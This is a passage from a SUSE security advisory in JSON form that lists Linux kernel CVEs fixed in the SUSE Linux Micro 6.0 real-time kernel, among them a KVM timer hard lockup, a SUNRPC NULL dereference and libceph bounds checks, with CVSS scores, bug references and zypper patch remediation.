a huge gap between\nthe target expiration and the current time the vCPU resumes running.\nBecause the target expiration is incremented by only one period on each\ntimer expiration, this leads to a series of timer expirations occurring\nrapidly after the vCPU/VM resumes.\n\nMore critically, when the vCPU first triggers a periodic HV timer\nexpiration after resuming, advancing the expiration by only one period\nwill result in a target expiration in the past. As a result, the delta\nmay be calculated as a negative value. When the delta is converted into\nan absolute value (tscdeadline is an unsigned u64), the resulting value\ncan overflow what the HV timer is capable of programming. I.e. the large\nvalue will exceed the VMX Preemption Timer\u0027s maximum bit width of\ncpu_preemption_timer_multi + 32, and thus cause KVM to switch from the\nHV timer to the software timer (hrtimers).\n\nAfter switching to the software timer, periodic timer expiration callbacks\nmay be executed consecutively within a single clock interrupt handler,\nbecause hrtimers honors KVM\u0027s request for an expiration in the past and\nimmediately re-invokes KVM\u0027s callback after reprogramming. And because\nthe interrupt handler runs with IRQs disabled, restarting KVM\u0027s hrtimer\nover and over until the target expiration is advanced to \"now\" can result\nin a hard lockup.\n\nE.g. the following hard lockup was triggered in the host when running a\nWindows VM (only relevant because it used the APIC timer in periodic mode)\nafter resuming the VM from a long suspend (in the host).\n\n NMI watchdog: Watchdog detected hard LOCKUP on cpu 45\n ...\n RIP: 0010:advance_periodic_target_expiration+0x4d/0x80 [kvm]\n ...\n RSP: 0018:ff4f88f5d98d8ef0 EFLAGS: 00000046\n RAX: fff0103f91be678e RBX: fff0103f91be678e RCX: 00843a7d9e127bcc\n RDX: 0000000000000002 RSI: 0052ca4003697505 RDI: ff440d5bfbdbd500\n RBP: ff440d5956f99200 R08: ff2ff2a42deb6a84 R09: 000000000002a6c0\n R10: 0122d794016332b3 R11: 0000000000000000 R12: ff440db1af39cfc0\n R13: ff440db1af39cfc0 R14: ffffffffc0d4a560 R15: ff440db1af39d0f8\n FS: 00007f04a6ffd700(0000) GS:ff440db1af380000(0000) knlGS:000000e38a3b8000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000d5651feff8 CR3: 000000684e038002 CR4: 0000000000773ee0\n PKRU: 55555554\n Call Trace:\n \u003cIRQ\u003e\n apic_timer_fn+0x31/0x50 [kvm]\n __hrtimer_run_queues+0x100/0x280\n hrtimer_interrupt+0x100/0x210\n ? ttwu_do_wakeup+0x19/0x160\n smp_apic_timer_interrupt+0x6a/0x130\n apic_timer_interrupt+0xf/0x20\n \u003c/IRQ\u003e\n\nMoreover, if the suspend duration of the virtual machine is not long enough\nto trigger a hard lockup in this scenario, since commit 98c25ead5eda\n(\"KVM: VMX: Move preemption timer \u003c=\u003e hrtimer dance to common x86\"), KVM\nwill continue using the software timer until the guest reprograms the APIC\ntimer in some way. Since the periodic timer does not require frequent APIC\ntimer register programming, the guest may continue to use the software\ntimer in \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71104",
"url": "https://www.suse.com/security/cve/CVE-2025-71104"
},
{
"category": "external",
"summary": "SUSE Bug 1256708 for CVE-2025-71104",
"url": "https://bugzilla.suse.com/1256708"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71104"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n\u0027inflight\u0027 variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx-\u003einflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71113",
"url": "https://www.suse.com/security/cve/CVE-2025-71113"
},
{
"category": "external",
"summary": "SUSE Bug 1256716 for CVE-2025-71113",
"url": "https://bugzilla.suse.com/1256716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71113"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
